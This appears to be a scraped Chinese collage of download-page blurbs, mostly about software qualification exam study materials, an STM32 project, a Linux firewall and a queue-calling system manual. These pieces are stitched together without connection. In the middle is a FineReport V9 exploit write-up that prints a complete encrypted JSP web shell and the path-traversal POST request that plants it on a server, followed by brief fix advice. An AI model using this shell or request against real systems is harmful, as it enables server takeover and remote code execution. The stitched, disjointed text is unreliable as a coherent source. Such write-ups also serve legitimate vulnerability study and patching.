之前备考软考中级时从希赛一个老师上得到的，感觉挺有用的。 里面包括有模拟卷，经典案例题分析，经典100题，知识点默写本，易混淆知识点，重要知识点速记等资料 需要备考软考中级信安且有需要的小伙伴自取~

信息系统管理工程师教程（陈禹版），加高手复习重点资料汇总，有助于软考通过。

### 帆软V9getshell1：任意文件覆盖与JSP Web Shell植入详解 #### 一、背景介绍 帆软软件有限公司（FineSoft）是中国领先的企业级报表工具及商业智能解决方案提供商，其核心产品之一为FineReport报表设计工具。在2023年某次安全研究中发现了一个严重安全漏洞——任意文件覆盖（Arbitrary File Overwrite），该漏洞允许攻击者通过特定的操作路径上传恶意JSP脚本到目标服务器上，进而获得服务器权限。这一漏洞被命名为“帆软V9getshell1”。 #### 二、漏洞原理 ##### 2.1 任意文件覆盖机制 任意文件覆盖是指攻击者能够替换或修改服务器上的现有文件。在帆软报表系统的实现中，存在一处逻辑缺陷使得攻击者可以利用该功能来覆盖特定的JSP文件。 ##### 2.2 JSP马的上传与执行 1. **文件路径构造**：攻击者通过精心构造请求中的`filePath`参数，指向一个合法的JSP文件路径。例如，攻击者可以通过设置`filePath`为`../../../../WebReport/update.jsp`，将恶意代码写入到`WebReport`目录下的`update.jsp`文件中。 2. **恶意JSP代码**：攻击者准备了如下恶意JSP代码： ```jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> <% class U extends ClassLoader{ U(ClassLoader c){ super(c); } public Class g(byte []b){ return super.defineClass(b,0,b.length); } } if(request.getParameter("pass")!=null) { String k=(""+UUID.randomUUID()).replace("-", "").substring(16); session.putValue("u",k); out.print(k); return; } Cipher c=Cipher.getInstance("AES"); c.init(2,new SecretKeySpec((session.getValue("u")+ "").getBytes(),"AES")); new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext); %> ``` 该代码实现了以下功能： - 通过`request.getParameter("pass")`判断是否接收到触发命令。 - 使用AES加密算法对会话中的密钥进行初始化，并解码用户发送的数据。 - 动态加载并执行解密后的类文件，实现远程代码执行。 3. **HTTP请求示例**：攻击者通过发送如下POST请求将恶意代码写入指定位置： ``` POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1 Host: 192.168.169.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 Connection: close Accept-Au: 0c42b2f264071be0507acea1876c74 Content-Type: text/xml;charset=UTF-8 Content-Length: 675 {"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%>......","__CHARSET__":"UTF-8"} ``` 4. **利用Tomcat自带的JSP文件**：由于帆软报表系统通常部署在Apache Tomcat服务器上，攻击者可以利用Tomcat默认存在的JSP文件（例如`/tomcat-7.0.96/webapps/ROOT/index.jsp`）作为切入点，通过覆盖这些文件来植入恶意代码。 #### 三、修复建议 1. **升级补丁**：及时安装官方发布的最新版本或安全补丁，以修复已知的安全问题。 2. **限制文件路径**：对用户提交的文件路径进行严格的验证和过滤，避免攻击者通过构造恶意路径覆盖敏感文件。 3. **加强认证与授权**：对关键操作增加二次验证机制，限制非授权用户的访问权限，确保只有经过身份验证的用户才能执行敏感操作。 4. **审计日志记录**：开启并维护详细的审计日志，以便在发生异常情况时进行追踪和分析。 #### 四、总结 帆软V9getshell1这一漏洞揭示了在开发过程中忽视输入验证和权限控制所带来的潜在风险。企业应高度重视此类安全问题，并采取有效措施降低被攻击的风险。同时，用户也应增强安全意识，避免在不安全的网络环境中使用重要系统和服务。

1、内容概要：使用STM32CubeMX生成源码，主芯片为STM32L431RCT6实现SPI Flash的读写存储，采用8MHz的外部晶振作为时钟源。 2、适用人群：适合想要入坑嵌入式的新手、适合学习STM32/ARM开发板的新手、适合STM32L431RCT6芯片的评估和验证等。 3、使用场景及目标：新人学习，STM32L431RCT6芯片评估和替换，开发验证等。 4、开发工具：STM32CubeMX+keil mdk+串口调试助手 5、其他说明（源码使用的开发板资源为）： （1）开发板主芯片型号：STM32L431RCT6 （2）开发板主芯片封装：LQFP-64_10x10x05P （3）开发板主芯片内核：ARM-Cortex-M4 （4）开发板主芯片主频：80MHz （5）开发板主芯片Flash大小：256KB （6）开发板主芯片RAM大小：64KB

软件设计师中级学习资料是对准备参加软件设计师考试的专业人士而言极为重要的辅导材料。这些资料不仅包含了详尽的各章考点分析，而且涵盖了重要的软考笔记，这些笔记是前人经验的总结，能够帮助考生掌握考试的重点和难点。除此之外，核心100知识点及希赛网提供的100条知识点则是将软件设计师考试中必须掌握的关键点进行了梳理，为考生提供了一个明确的学习方向。这些资料还包含了精华知识点和案例分析，这对于考生理解理论知识并将其应用于实际工作中至关重要。同时，专业英语词汇的整理也是软件设计师考试中不可或缺的一部分，它帮助考生扫清了专业英语理解上的障碍。 整个软件设计师学习资料的内容安排合理，符合中级软件设计师考试的需要，有助于考生全面、系统地学习和复习。学习这些资料，考生可以对软件设计的基本理论和实践技能有一个全面的认识，进而在考试中取得好成绩。 考试不仅是对知识的考察，更是对学习者运用知识解决实际问题能力的检验。通过分析历年真题和案例分析，考生可以把握命题规律和考试趋势，从而在备考过程中更加有的放矢。此外，掌握专业英语词汇对于理解和分析软件设计中的英文文献和资料也是非常有帮助的，这不仅能提升考生的专业素养，还能拓宽其国际视野。 软件设计师中级考试要求考生不仅要有扎实的理论基础，还要有丰富的实践经验。因此，这部分学习资料还可能包括一些模拟题或者实操练习，以便考生将所学知识与实际工作相结合，提高解决实际问题的能力。通过反复练习和模拟测试，考生可以检验自己的学习成果，查漏补缺，从而在考试中展现出最佳状态。 这些软件设计师中级学习资料是专为应对软件设计师中级考试而设计的，它不仅涵盖了考试的全部知识点，还提供了许多实用的学习方法和策略。考生通过系统地学习这些资料，可以大幅提升自己的考试通过率。

本资源为软考初级-网络管理员的全套学习资料，旨在为备考网络管理员考试的考生提供全面、系统的学习支持。该资源包含了从基础知识到高级应用的各个方面，帮助考生深入理解网络管理的核心概念和实践技能。 全套资料涵盖了数据通信基础、网络协议、网络操作系统、网络安全等多个关键领域。在数据通信基础部分，考生将学习到通信系统基本概念、多路复用技术、信道特征等基础知识，为后续的网络管理打下坚实基础。网络协议部分则深入讲解了TCP/IP协议栈、各种网络层和应用层协议的工作原理和配置方法。此外，资料还详细介绍了网络操作系统的安装、配置和管理，以及网络安全的基本知识和防护措施。 除了理论知识，本资源还提供了大量的实践案例和练习题，帮助考生将所学知识应用于实际工作中。这些案例和练习题涵盖了网络管理的各个方面，如网络设备的配置与管理、网络故障排查与解决、网络性能优化等，有助于考生提高解决实际问题的能力。 总之，软考初级-网络管理员全套资料是一套极具价值的资源，它结结合了理论与实践，为备考网络管理员考试的考生提供了一个全面、系统的学习平台。

软考中级网络工程师考试是针对中国IT专业人员的一项重要考核，涉及的专业知识范围广泛，考核内容包括网络技术、网络设备、网络设计、网络安全、网络管理等多个方面。通过对核心笔记和核心考点资料的学习，考生能够系统地掌握网络工程师必备的基础知识和实践技能，为通过考试提供有力支持。 在提供的文件名称列表中，我们可以看到六份包含了网络工程师专业英语、图解学网络工程、考前冲刺知识点、笔记完整版、英文手册整理以及主流网络协议的资料。这些资料覆盖了网络工程师考试的多个重要领域，是备考过程中不可或缺的学习资源。 网络工程师专业英语是针对网络相关英文术语和缩略语的学习材料，它有助于考生在专业领域内准确理解并使用国际通用的技术语言。在国际化的网络环境中，掌握专业英语对于网络工程师的日常工作和技术交流至关重要。 图解学网络工程则可能采用了大量图表和示意图来直观解释网络原理和技术，这种直观的学习方式有助于提高学习效率，加深对网络结构和工作原理的理解。 网络工程师考前冲刺知识点这份资料可能是针对考试中最核心的重点内容的梳理，它对考生在考前阶段进行集中复习和查漏补缺具有重要作用。 网工笔记完整版包含了一系列详细的笔记，这些笔记可能涵盖了网络工程师在学习和工作中需要掌握的关键知识点，是考生平日学习积累的重要参考资料。 网工常见英文手册整理则集中了网络领域中常见设备和软件的英文术语，这本手册对于提高网络工程师的专业英语水平非常有帮助，也使得考生在面对英文版设备手册和资料时能够更加从容应对。 主流网络协议魔力图则是以图表形式展示了各种网络协议之间的关系和作用机制，它能够帮助考生形成对网络协议体系的整体认识，对于理解复杂网络协议的工作原理和应用场景有着不可替代的作用。 考生通过系统学习这些资料，不仅可以提高通过考试的可能性，更能提升自己在实际工作中解决网络问题的能力。在当前数字化时代背景下，网络工程师的专业能力对于企业和社会的信息技术发展具有重要的推动作用。因此，对于立志成为网络工程师的专业人士来说，这些资料无疑是宝贵的学习资源。

内容概要： 软考中级-项目集成管理中级笔记资源是针对项目集成管理中级考试内容精心整理的学习笔记。内容涵盖了项目集成管理领域的重要知识点，包括项目整合管理过程、项目综合分析和绩效评估等内容。笔记内容扼要而全面，适合考生系统复习和准备考试。 适用人群： 本资源适用于准备参加软考中级-项目集成管理中级考试的考生。无论是正在备考的学生、IT专业人士、项目管理人员，以及希望提升职业发展的各界人士，都能从中获得有益的学习资料和知识点。 使用场景： 个人学习：适合个人学习，帮助考生系统化、深入地掌握项目集成管理中级考试所需的知识点。 培训机构：适用于项目管理培训机构作为教材或参考资料，用于培训学员提升项目管理能力。 企业内部培训：可用于企业内部项目管理人员的培训和考核，帮助提高团队项目管理能力。 目标： 帮助考生全面复习项目集成管理中级考试所涉及的知识点，高效备考并顺利通过考试。 提供系统性的学习资料，帮助从业人员深入理解项目集成管理的概念和实践，并在工作中更好地应用。 提升个人和团队在项目集成管理领域的专业能力，提高项目管理工作的执行效率和质量。 ### 软考中级-项目集成管理中级笔记 #### 一、信息与信息化 ##### 1.1 信息 **信息的基本概念** - **定义**：信息是客观事物的状态和运动特征的一种普遍形式，存在于客观世界中并通过各种方式表示出来。 - **维纳的观点**：信息既不是物质也不是能量。 - **本体论主体观点**：信息是对事物运动状态及其变化方式的具体表述。 - **认识论观点**：信息是能够消除不确定性的元素。 - **信息论之父香浓的观点**：信息能够消除不确定性。 **信息传输模型与技术** - **核心**：信息技术的核心在于信息的传输技术。 - **信息系统主要指标**：有效性和可靠性。 - **信息质量属性** - **精确性**：描述事物状态的准确性。 - **完整性**：描述事物状态的全面性。 - **可靠性**：信息来源、采集方法、传输过程的可信度。 - **及时性**：信息获取时间与事件发生时间的间隔。 - **经济性**：信息获取与传输的成本。 - **可验证性**：信息的主要质量属性可以被证实或证伪的程度。 - **安全性**：信息生命周期中被非授权访问的可能性。 ##### 1.2 信息系统 **基本信息** - **定义**：由硬件、软件、数据库、网络、存储设备、感知设备、外设、人员以及规程组成，用于处理数据成信息的系统。 - **特性**：目的性、可嵌套性、稳定性、开放性、脆弱性、健壮性。 - **集成**：将各部分按照规划结构和顺序整合到一个有清晰边界的系统中，以实现既定目标。 ##### 1.3 信息化 **层次** 1. **产品信息化**：如智能手机、智能家居等。 2. **企业信息化**：包括MES、ERP、CRM、SCM等系统。 3. **产业信息化**：智慧农业、工业、交通等行业应用。 4. **国民经济信息化**：覆盖生产、流通、消费、分配等环节。 5. **社会生活信息化**：智慧城市、互联网金融等领域。 **核心及其内涵** - **主体**：全社会成员。 - **时域**：长期过程。 - **空域**：政治、经济、文化、军事和社会各方面。 - **手段**：基于信息技术的社会生产工具。 - **途径**：创造信息时代生产力，推动生产关系和社会上层建筑改革。 - **目标**：提升国家实力、社会文明素质和人民生活质量。 ##### 1.4 国家信息化体系要素 - **信息技术应用**：信息化体系的龙头。 - **信息资源**：与材料资源和能源并列为战略资源。 - **信息网络**：信息资源开发利用的基础。 - **信息技术和产业**：信息化建设的基础。 - **信息化人才**：信息化成功的关键。 - **信息化政策法规和标准规范**：信息化健康发展的保障。 ##### 1.5 信息技术的发展趋势 - **“十三五”期间重点发展**：人工智能、智能移动终端、第五代移动通信(5G)、先进传感器等。 - **新技术应用**：高速度大容量、集成化和平台化、智能化、以人为本、移动智能终端、遥感和传感技术、虚拟计算、信息安全、通信技术、两化融合等。 - **两化融合**：信息化与工业化发展战略的融合、信息资源与材料能源资源的融合、虚拟经济与工业实体经济的融合、信息技术与工业技术的融合等。 #### 二、电子政务 **模式** - **政府对政府 (G2G)** - **政府对企业 (G2B)** - **政府对公众 (G2C)** - **政府对公务员 (G2E)** **发展方针** - **坚持科学发展观贯穿电子政务发展全过程**。 - **坚持以人为本和构建和谐社会作为出发点和落脚点**。 - **坚持深化应用和突出成效作为发展的根本要求**。 - **坚持创新发展和加强管理的有机统一**。 **基础设施** - **“两网、一站、四库、十二金”** - **两网**：政务内网和政务外网。 - **一站**：政府门户网站。 - **四库**：人口、法人单位、自然资源和空间地理、宏观经济等信息资源库。 - **十二金**：包括金税、金关、金财、金审、金卡等电子政务重点业务系统。 以上内容总结了软考中级-项目集成管理中级考试中关于信息与信息化的基础知识，为考生提供了全面且深入的理解框架，有助于考生在备考过程中更有效地掌握关键知识点。

本文主要介绍利用Linux自带的Firewall软件包来构建软路由的一种方法，此方法为内部网与外部网的互连提供了一种简单、安全的实现途径。Linux自带的Firewall构建软路由，主要是通过IP地址来控制访问权限，较一般的代理服务软件有更方便之处。防火墙一词用在计算机网络中是指用于保护内部网不受外部网的非法入侵的设备，它是利用网络层的IP包过滤程序以及一些规则来保护内部网的一种策略，有硬件实现的，也有软件实现的。

智能排队叫号与分诊系统用户手册详细介绍了一款智能系统的运作方式、功能以及使用方法，旨在为用户提供完整和方便的操作指导。系统概述部分首先对智能排队叫号、分诊系统的基本功能和管理操作进行了概括，强调了系统对排队叫号信息进行统一管理的重要性，以及系统设置对用户管理和服务设置的便利性。系统的主要功能包括排队叫号管理、排队信息显示、叫号内容编辑、服务设置、叫号操作、叫号屏管理、系统管理等。 登录页面的介绍强调了软件的基本操作流程，即用户在打开系统后，需要通过输入用户名、密码以及验证码来完成登录认证。这一步骤对于系统的安全性至关重要，只有验证无误后用户才能成功登录并使用系统。在登录失败的情况下，系统会提示错误信息，并要求用户重新输入正确的登录凭证。 系统的主要页面，即主页面介绍部分，呈现了软件的主要操作界面。用户在登录成功后，可以看到一系列的功能按钮，通过这些按钮可以进入系统的主要功能模块，进行各种操作。 软件功能部分详细讲解了系统提供的各种功能及其操作。排队叫号管理功能页面显示当前排队叫号的情况，包括每日开放总号数、已取号数、剩余号数等信息。用户可以在此页面进行取号操作。 排队信息显示功能让系统能够展示当前的排队情况和等候顺序信息。用户可以清晰地看到等候的情况，以便合理安排行程。 叫号内容编辑功能允许用户根据需求对叫号内容进行自定义设置。服务设置功能则让用户可以对叫号服务中的语音、语速、音量等进行个性化调整，甚至可以进行语音测试以确保设置的准确性。 此外，系统还提供了叫号屏管理功能，允许对叫号屏内容进行编辑和管理。系统管理功能则涉及到更深层次的系统设置，包括但不限于用户权限管理、数据备份和恢复等功能。 整个用户手册的设计注重用户友好和操作简便，旨在让用户在最短的时间内学会如何使用智能排队叫号与分诊系统，提高工作效率和服务质量。